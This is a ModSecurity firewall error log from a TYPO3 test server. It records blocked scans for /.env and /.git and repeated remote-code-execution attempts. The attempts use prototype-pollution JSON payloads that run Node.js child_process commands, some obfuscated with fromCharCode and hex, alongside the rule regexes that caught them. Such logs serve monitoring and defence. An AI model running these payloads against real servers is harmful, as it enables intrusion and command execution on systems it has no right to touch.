[Sat Dec 13 19:27:51.089962 2025] [:error] [pid 714771] [client 204.76.203.25:33178] [client 204.76.203.25] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aT2wJ8l6s-8p1z6ntod6tAAAAEQ"]
[Sat Dec 13 19:27:51.090130 2025] [:error] [pid 714771] [client 204.76.203.25:33178] [client 204.76.203.25] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aT2wJ8l6s-8p1z6ntod6tAAAAEQ"]
[Sun Dec 14 20:29:30.998858 2025] [:error] [pid 740192] [client 52.87.178.118:49380] [client 52.87.178.118] ModSecurity: Warning. Pattern match "(?:\\\\$(?:\\\\((?:\\\\(.*\\\\)|.*)\\\\)|\\\\{.*\\\\})|[<>]\\\\(.*\\\\))" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"] [line "372"] [id "932130"] [msg "Remote Command Execution: Unix Shell Expression Found"] [data "Matched Data: ${res} 307 `}) _chunks: $q2 _formdata: {get: $1:constructor:constructor}}} found within ARGS:0: {then: $1:__proto__:then status: resolved_model reason: -1 value: {then:$b1337} _response: {_prefix: var res=process.mainmodule.require(child_process).execsync(echo vuln_test_123456 | base64 -w 0).tostring().trim() throw object.assign(new error(next_redirect) {digest: `next_redirect push/login?a=${res} 307 `}) _chunks: $q2 _formdata: {get: $1:constructor:constructor}}}"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-shell"] [tag "platform-unix"] [tag "attack-rce"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aT8QGkAm06IYTYly23IfpQAAAAk"]
[Sun Dec 14 20:29:30.999528 2025] [:error] [pid 740192] [client 52.87.178.118:49380] [client 52.87.178.118] ModSecurity: Warning. Pattern match "(?i)[\\\\s\\\\S]((?:x(?:link:href|html|mlns)|!ENTITY.*?(?:SYSTEM|PUBLIC)|data:text\\\\/html|formaction|\\\\@import|base64)\\\\b|pattern\\\\b.*?=)" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "149"] [id "941130"] [msg "XSS Filter - Category 3: Attribute Vector"] [data "Matched Data: base64 found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x22then\\x22:\\x22$B1337\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var res=process.mainModule.require('child_process').execSync('echo VULN_TEST_123456 | base64 -w 0').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22, \\x22_chunks\\x22: \\x22$Q2\\x22, \\x22_formData\\..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS"] [tag "OWASP_CRS/W [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aT8QGkAm06IYTYly23IfpQAAAAk"]
[Sun Dec 14 20:29:31.001487 2025] [:error] [pid 740192] [client 52.87.178.118:49380] [client 52.87.178.118] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aT8QGkAm06IYTYly23IfpQAAAAk"]
[Sun Dec 14 20:29:31.001752 2025] [:error] [pid 740192] [client 52.87.178.118:49380] [client 52.87.178.118] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=5,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aT8QGkAm06IYTYly23IfpQAAAAk"]
[Sun Dec 14 20:29:33.067382 2025] [:error] [pid 735495] [client 52.87.178.118:49460] [client 52.87.178.118] ModSecurity: Warning. Pattern match "(?:\\\\$(?:\\\\((?:\\\\(.*\\\\)|.*)\\\\)|\\\\{.*\\\\})|[<>]\\\\(.*\\\\))" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"] [line "372"] [id "932130"] [msg "Remote Command Execution: Unix Shell Expression Found"] [data "Matched Data: ${res} 307 `}) _chunks: $q2 _formdata: {get: $1:constructor:constructor}}} found within ARGS:0: {then: $1:__proto__:then status: resolved_model reason: -1 value: {then:$b1337} _response: {_prefix: var res=process.mainmodule.require(child_process).execsync(echo vuln_test_123456 | base64 -w 0).tostring().trim() throw object.assign(new error(next_redirect) {digest: `next_redirect push/login?a=${res} 307 `}) _chunks: $q2 _formdata: {get: $1:constructor:constructor}}}"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-shell"] [tag "platform-unix"] [tag "attack-rce"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aT8QHTLTNN2v7TAFw3jPhAAAAAA"]
[Sun Dec 14 20:29:33.068021 2025] [:error] [pid 735495] [client 52.87.178.118:49460] [client 52.87.178.118] ModSecurity: Warning. Pattern match "(?i)[\\\\s\\\\S]((?:x(?:link:href|html|mlns)|!ENTITY.*?(?:SYSTEM|PUBLIC)|data:text\\\\/html|formaction|\\\\@import|base64)\\\\b|pattern\\\\b.*?=)" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "149"] [id "941130"] [msg "XSS Filter - Category 3: Attribute Vector"] [data "Matched Data: base64 found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x22then\\x22:\\x22$B1337\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var res=process.mainModule.require('child_process').execSync('echo VULN_TEST_123456 | base64 -w 0').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22, \\x22_chunks\\x22: \\x22$Q2\\x22, \\x22_formData\\..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS"] [tag "OWASP_CRS/W [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aT8QHTLTNN2v7TAFw3jPhAAAAAA"]
[Sun Dec 14 20:29:33.069367 2025] [:error] [pid 735495] [client 52.87.178.118:49460] [client 52.87.178.118] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aT8QHTLTNN2v7TAFw3jPhAAAAAA"]
[Sun Dec 14 20:29:33.069582 2025] [:error] [pid 735495] [client 52.87.178.118:49460] [client 52.87.178.118] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=5,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aT8QHTLTNN2v7TAFw3jPhAAAAAA"]
[Sun Dec 14 22:21:35.342876 2025] [authz_core:error] [pid 740196] [client 45.153.34.216:33106] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Mon Dec 15 04:34:24.895862 2025] [:error] [pid 746440] [client 138.68.79.50:60102] [client 138.68.79.50] ModSecurity: Rule 7fc91b082e58 [id "932140"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "419"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aT-BwArH4RH7VS2dsCbkJAAAAAU"]
[Mon Dec 15 04:34:24.898023 2025] [:error] [pid 746440] [client 138.68.79.50:60102] [client 138.68.79.50] ModSecurity: Warning. Pattern match "(?:(?:\\\\(|\\\\[)[a-zA-Z0-9_.$\\"'\\\\[\\\\](){}/*\\\\s]+(?:\\\\)|\\\\])[0-9_.$\\"'\\\\[\\\\](){}/*\\\\s]*\\\\([a-zA-Z0-9_.$\\"'\\\\[\\\\](){}/*\\\\s].*\\\\)|\\\\([\\\\s]*string[\\\\s]*\\\\)[\\\\s]*(?:\\"|'))" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "504"] [id "933210"] [msg "PHP Injection Attack: Variable Function Call Found"] [data "Matched Data: ('return global.require')(); } catch(e) {} } if (!req) throw new Error('No require found'); var vm_code = \\x5c\\x5cu0067\\x5c\\x5cu006c\\x5c\\x5cu006f\\x5c\\x5cu0062\\x5c\\x5cu0061\\x5c\\x5cu006c[String.fromCharCode(66,117,102,102,101,114)].from('2866756e6374696f6e2829207b2076617220726571203d206e756c6c3b20747279207b20726571203d205c75303037305c75303037325c75303036665c75303036335c75303036355c75303037335c75303037335b537472696e672e66726f6d43686172436f6465283130392c39372c3130352c3131302c37372c3131312c31303..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-in [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aT-BwArH4RH7VS2dsCbkJAAAAAU"]
[Mon Dec 15 04:34:24.898236 2025] [:error] [pid 746440] [client 138.68.79.50:60102] [client 138.68.79.50] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: String.fromCharCode found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22: \\x5c\\x22$B0\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22try { var req = null; try { req = \\x5c\\x5cu0070\\x5c\\x5cu0072\\x5c\\x5cu006f\\x5c\\x5cu0063\\x5c\\x5cu0065\\x5c\\x5cu0073\\x5c\\x5cu0073[String.fromCharCode(109,97,105,110,77,111,100,117,108,101)][String.fromCharCode(114,101,113,117,105,114,101)]; } catc..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce" [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aT-BwArH4RH7VS2dsCbkJAAAAAU"]
[Mon Dec 15 04:34:24.898426 2025] [:error] [pid 746440] [client 138.68.79.50:60102] [client 138.68.79.50] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: String.fromCharCode found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22: \\x5c\\x22$B0\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22try { var req = null; try { req = \\x5c\\x5cu0070\\x5c\\x5cu0072\\x5c\\x5cu006f\\x5c\\x5cu0063\\x5c\\x5cu0065\\x5c\\x5cu0073\\x5c\\x5cu0073[String.fromCharCode(109,97,105,110,77,111,100,117,108,101)][String.fromCharCode(114,101,113,117,105,114,101)]; } catc..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce" [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aT-BwArH4RH7VS2dsCbkJAAAAAU"]
[Mon Dec 15 04:34:24.924294 2025] [:error] [pid 746440] [client 138.68.79.50:60102] [client 138.68.79.50] ModSecurity: Rule 7fc91b9a9320 [id "941140"][file "/usr/share/modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"][line "179"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aT-BwArH4RH7VS2dsCbkJAAAAAU"]
[Mon Dec 15 04:34:24.924494 2025] [:error] [pid 746440] [client 138.68.79.50:60102] [client 138.68.79.50] ModSecurity: Rule 7fc91b99c030 [id "941160"][file "/usr/share/modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"][line "218"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aT-BwArH4RH7VS2dsCbkJAAAAAU"]
[Mon Dec 15 04:34:24.933055 2025] [:error] [pid 746440] [client 138.68.79.50:60102] [client 138.68.79.50] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 15)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aT-BwArH4RH7VS2dsCbkJAAAAAU"]
[Mon Dec 15 04:34:24.933276 2025] [:error] [pid 746440] [client 138.68.79.50:60102] [client 138.68.79.50] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 15 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=10,PHPI=5,HTTP=0,SESS=0): individual paranoia level scores: 15, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aT-BwArH4RH7VS2dsCbkJAAAAAU"]
[Mon Dec 15 06:13:54.009932 2025] [:error] [pid 746259] [client 46.101.119.189:33468] [client 46.101.119.189] ModSecurity: Rule 7fc91b082e58 [id "932140"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "419"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aT-ZEgFq0qwwlrFlbYxPaQAAAAI"]
[Mon Dec 15 06:13:54.011873 2025] [:error] [pid 746259] [client 46.101.119.189:33468] [client 46.101.119.189] ModSecurity: Warning. Pattern match "(?:(?:\\\\(|\\\\[)[a-zA-Z0-9_.$\\"'\\\\[\\\\](){}/*\\\\s]+(?:\\\\)|\\\\])[0-9_.$\\"'\\\\[\\\\](){}/*\\\\s]*\\\\([a-zA-Z0-9_.$\\"'\\\\[\\\\](){}/*\\\\s].*\\\\)|\\\\([\\\\s]*string[\\\\s]*\\\\)[\\\\s]*(?:\\"|'))" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "504"] [id "933210"] [msg "PHP Injection Attack: Variable Function Call Found"] [data "Matched Data: ('return global.require')(); } catch(e) {} } if (!req) throw new Error('No require found'); var vm_code = \\x5c\\x5cu0067\\x5c\\x5cu006c\\x5c\\x5cu006f\\x5c\\x5cu0062\\x5c\\x5cu0061\\x5c\\x5cu006c[String.fromCharCode(66,117,102,102,101,114)].from('2866756e6374696f6e2829207b2076617220726571203d206e756c6c3b20747279207b20726571203d205c75303037305c75303037325c75303036665c75303036335c75303036355c75303037335c75303037335b537472696e672e66726f6d43686172436f6465283130392c39372c3130352c3131302c37372c3131312c31303..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-in [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aT-ZEgFq0qwwlrFlbYxPaQAAAAI"]
[Mon Dec 15 06:13:54.012075 2025] [:error] [pid 746259] [client 46.101.119.189:33468] [client 46.101.119.189] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: String.fromCharCode found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22: \\x5c\\x22$B0\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22try { var req = null; try { req = \\x5c\\x5cu0070\\x5c\\x5cu0072\\x5c\\x5cu006f\\x5c\\x5cu0063\\x5c\\x5cu0065\\x5c\\x5cu0073\\x5c\\x5cu0073[String.fromCharCode(109,97,105,110,77,111,100,117,108,101)][String.fromCharCode(114,101,113,117,105,114,101)]; } catc..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce" [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aT-ZEgFq0qwwlrFlbYxPaQAAAAI"]
[Mon Dec 15 06:13:54.012251 2025] [:error] [pid 746259] [client 46.101.119.189:33468] [client 46.101.119.189] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: String.fromCharCode found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22: \\x5c\\x22$B0\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22try { var req = null; try { req = \\x5c\\x5cu0070\\x5c\\x5cu0072\\x5c\\x5cu006f\\x5c\\x5cu0063\\x5c\\x5cu0065\\x5c\\x5cu0073\\x5c\\x5cu0073[String.fromCharCode(109,97,105,110,77,111,100,117,108,101)][String.fromCharCode(114,101,113,117,105,114,101)]; } catc..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce" [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aT-ZEgFq0qwwlrFlbYxPaQAAAAI"]
[Mon Dec 15 06:13:54.039197 2025] [:error] [pid 746259] [client 46.101.119.189:33468] [client 46.101.119.189] ModSecurity: Rule 7fc91b9a9320 [id "941140"][file "/usr/share/modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"][line "179"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aT-ZEgFq0qwwlrFlbYxPaQAAAAI"]
[Mon Dec 15 06:13:54.039390 2025] [:error] [pid 746259] [client 46.101.119.189:33468] [client 46.101.119.189] ModSecurity: Rule 7fc91b99c030 [id "941160"][file "/usr/share/modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"][line "218"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aT-ZEgFq0qwwlrFlbYxPaQAAAAI"]
[Mon Dec 15 06:13:54.048436 2025] [:error] [pid 746259] [client 46.101.119.189:33468] [client 46.101.119.189] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 15)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aT-ZEgFq0qwwlrFlbYxPaQAAAAI"]
[Mon Dec 15 06:13:54.048732 2025] [:error] [pid 746259] [client 46.101.119.189:33468] [client 46.101.119.189] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 15 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=10,PHPI=5,HTTP=0,SESS=0): individual paranoia level scores: 15, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aT-ZEgFq0qwwlrFlbYxPaQAAAAI"]
[Mon Dec 15 09:38:15.583684 2025] [:error] [pid 746257] [client 207.154.244.234:60782] [client 207.154.244.234] ModSecurity: Rule 7fc91b082e58 [id "932140"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "419"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aT_I933E8lQgMp2I0Im7EwAAAAA"]
[Mon Dec 15 09:38:15.585710 2025] [:error] [pid 746257] [client 207.154.244.234:60782] [client 207.154.244.234] ModSecurity: Warning. Pattern match "(?:(?:\\\\(|\\\\[)[a-zA-Z0-9_.$\\"'\\\\[\\\\](){}/*\\\\s]+(?:\\\\)|\\\\])[0-9_.$\\"'\\\\[\\\\](){}/*\\\\s]*\\\\([a-zA-Z0-9_.$\\"'\\\\[\\\\](){}/*\\\\s].*\\\\)|\\\\([\\\\s]*string[\\\\s]*\\\\)[\\\\s]*(?:\\"|'))" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "504"] [id "933210"] [msg "PHP Injection Attack: Variable Function Call Found"] [data "Matched Data: ('return global.require')(); } catch(e) {} } if (!req) throw new Error('No require found'); var vm_code = \\x5c\\x5cu0067\\x5c\\x5cu006c\\x5c\\x5cu006f\\x5c\\x5cu0062\\x5c\\x5cu0061\\x5c\\x5cu006c[String.fromCharCode(66,117,102,102,101,114)].from('2866756e6374696f6e2829207b2076617220726571203d206e756c6c3b20747279207b20726571203d205c75303037305c75303037325c75303036665c75303036335c75303036355c75303037335c75303037335b537472696e672e66726f6d43686172436f6465283130392c39372c3130352c3131302c37372c3131312c31303..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-in [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aT_I933E8lQgMp2I0Im7EwAAAAA"]
[Mon Dec 15 09:38:15.585925 2025] [:error] [pid 746257] [client 207.154.244.234:60782] [client 207.154.244.234] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: String.fromCharCode found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22: \\x5c\\x22$B0\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22try { var req = null; try { req = \\x5c\\x5cu0070\\x5c\\x5cu0072\\x5c\\x5cu006f\\x5c\\x5cu0063\\x5c\\x5cu0065\\x5c\\x5cu0073\\x5c\\x5cu0073[String.fromCharCode(109,97,105,110,77,111,100,117,108,101)][String.fromCharCode(114,101,113,117,105,114,101)]; } catc..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce" [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aT_I933E8lQgMp2I0Im7EwAAAAA"]
[Mon Dec 15 09:38:15.586101 2025] [:error] [pid 746257] [client 207.154.244.234:60782] [client 207.154.244.234] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: String.fromCharCode found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22: \\x5c\\x22$B0\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22try { var req = null; try { req = \\x5c\\x5cu0070\\x5c\\x5cu0072\\x5c\\x5cu006f\\x5c\\x5cu0063\\x5c\\x5cu0065\\x5c\\x5cu0073\\x5c\\x5cu0073[String.fromCharCode(109,97,105,110,77,111,100,117,108,101)][String.fromCharCode(114,101,113,117,105,114,101)]; } catc..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce" [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aT_I933E8lQgMp2I0Im7EwAAAAA"]
